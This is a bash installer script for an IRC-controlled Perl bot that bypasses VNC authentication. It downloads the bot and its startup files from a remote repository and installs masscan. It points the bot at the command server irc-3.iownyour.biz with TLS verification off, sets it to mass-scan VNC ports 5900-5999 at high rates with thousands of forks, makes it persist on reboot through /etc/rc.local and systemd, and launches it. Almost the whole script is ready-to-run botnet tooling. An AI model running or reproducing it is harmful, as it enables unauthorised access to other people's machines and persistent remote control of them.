#!/bin/bash
if [ ! -f "./perlircssl.pl" ]; then curl -o perlircssl.pl -Lv https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/perlircssl.pl; fi;
clear;
echo "Perl VNC ByPass AUTH IRC Bot with SSL";
echo "Made by github.com/ind3p3nd3nt";
echo 'http://is.gd/perlvncbot';
read -p "Install required packages? Y or LEAVE BLANK + ENTER" choice
case $choice in
 Y) if [ -f "/usr/bin/yum" ]; then
     yum install epel-release masscan openssl-devel libpcap-devel perl-CPAN* cmake -y;
 yum groupinstall "Development Tools" -y;
perl -MCPAN -e install CPAN;
perl -MCPAN -e reload CPAN;
 cpan -fi Digest::MD5;
 cpan -fi Net::SSLeay; 
 cpan -fi IO::Socket::SSL; 
 cpan -fi Time::HiRes;
 cpan -fi Mojolicious; 
 cpan -fi Mojo::IRC;
 cpan -fi Net::Address::IP::Local;
fi
if [ -f "/usr/bin/apt" ]; then
 apt-get update;
 apt-get install build-essential perl libssl-dev masscan libpcap-dev cpan-listchanges cpanoutdated -y;
perl -MCPAN -e install CPAN;
perl -MCPAN -e reload CPAN;
 cpan -fi Mojo::IRC;
 cpan -fi IO::Socket::SSL;
 cpan -fi Net::Address::IP::Local;
fi
esac
read -p "Proceed to bot configurations? [Y/A] or LEAVE BLANK + ENTER" choice
case $choice in
 A) 
 sed -i "perlircssl.pl" -e "s/#defineserverhere/server => \'irc-3.iownyour.biz:6697\',/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#definesslhere/\$irc->tls({insecure => 1});/g" "perlircssl.pl";
 sed -i "perlircssl.pl" -e "s/#definenickhere/nick => \'VNC\'.int(rand(99999)),/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#definechanhere/my \$channel = \'#VNC\';/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#definenoticechanhere/my \$noticechan = \'@#VNC\';/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#definetimeouthere/my \$forktimeout = "20";/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#defineforkshere/my \$maxforks = "2000";/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s|#defineportshere|my @VNC_PORTS = qw/\'5900 5901 5902 5903 5904 5905 5906 5907 5908 5909 5910 5911 5912 5913 5914 5915 5916 5917 5918 5919 5920 5921 5922 5923 5924 5925 5926 5927 5928 5929 5930 5931 5932 5933 5934 5935 5936 5937 5938 5939 5940 5941 5942 5943 5944 5945 5946 5947 5948 5949 5950 5951 5952 5953 5954 5955 5956 5957 5958 5959 5960 5961 5962 5963 5964 5965 5966 5967 5968 5969 5970 5971 5972 5973 5974 5975 5976 5977 5978 5979 5980 5981 5982 5983 5984 5985 5986 5987 5988 5989 5990 5991 5992 5993 5994 5995 5996 5997 5998 5999\'/;|g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s|--rate 25000|--rate "50000"|g" "perlircssl.pl"
 echo "Auto-configuration succeeded.";;
 Y)  
if read -p "IRC server:port? " name; then
 sed -i "perlircssl.pl" -e "s/#defineserverhere/server => \'${name}\',/g" "perlircssl.pl"
fi
read -p "Is the IRC port listening over SSL encryption? < 1 / 0 > (1=Yes, 0=No)" ssl
case $ssl in
 0) sed -i "perlircssl.pl" -e "s/#definesslhere/\$irc->tls({insecure => ${ssl}});/g" "perlircssl.pl";;
*) sed -i "perlircssl.pl" -e "s/#definesslhere/\$irc->tls({insecure => 1});/g" "perlircssl.pl";;
esac
if read -p "Bot Nickname Base? (Bawt)" nick; then
 sed -i "perlircssl.pl" -e "s/#definenickhere/nick => \'$nick\'.int(rand(99999)),/g" "perlircssl.pl"
fi
if read -p "Channel to join when connected? (#Hackers)" ch4n; then
 sed -i "perlircssl.pl" -e "s/#definechanhere/my \$channel = \'$ch4n\';/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#definenoticechanhere/my \$noticechan = \'@$ch4n\';/g" "perlircssl.pl"
fi
if read -p "Fork timeout in seconds? (Recommended: 10-60)" timeout; then
 sed -i "perlircssl.pl" -e "s/#definetimeouthere/my \$forktimeout = "$timeout";/g" "perlircssl.pl"
fi
if read -p "Maximum number of forks? (Recommended: 50-2000)" m4xfork; then
 sed -i "perlircssl.pl" -e "s/#defineforkshere/my \$maxforks = "$m4xfork";/g" "perlircssl.pl"
fi
if read -p "Define the ports numbers to scan (Recommended:5900 (You can add as many port you want, separated by a space))" ports; then
 sed -i "perlircssl.pl" -e "s|#defineportshere|my @VNC_PORTS = qw/\'$ports\'/;|g" "perlircssl.pl"
fi
if read -p "Masscan RATE-LIMIT/Recommended: 25000" mrate; then
 sed -i "perlircssl.pl" -e "s|--rate 25000|--rate "$mrate"|g" "perlircssl.pl"
fi
cp -r ./perlircssl.pl ~/perlircssl.pl;
read -p "Add bot autorun on reboot?" choice
case $choice in
 Y)  if [ ! -f "./rc.local" ]; then curl -Lv -o /etc/rc.local https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/rc.local; else cp -r ./rc.local /etc/rc.local; fi;
chown $USER /etc/rc.local;
chmod 755 /etc/rc.local;
touch /etc/systemd/system/rc-local.service;
if [ ! -f "./rc-local.service" ]; then curl -Lv -o /etc/systemd/system/rc-local.service https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/rc-local.service; else cp -r ./rc-local.service /etc/systemd/system/rc-local.service; fi;
systemctl enable rc-local;;  
esac
read -p "In order for bot to work you need to be operator in the channel, it also must be registered with services and YOU MUST autovoice your bots else you will not get any output in the server, ARE YOU READY TO LAUNCH THE PERL SCRIPT??? (Y or LEAVE BLANK + ENTER" choices
case $choices in
 Y)  perl perlircssl.pl &;;  
esac
esac
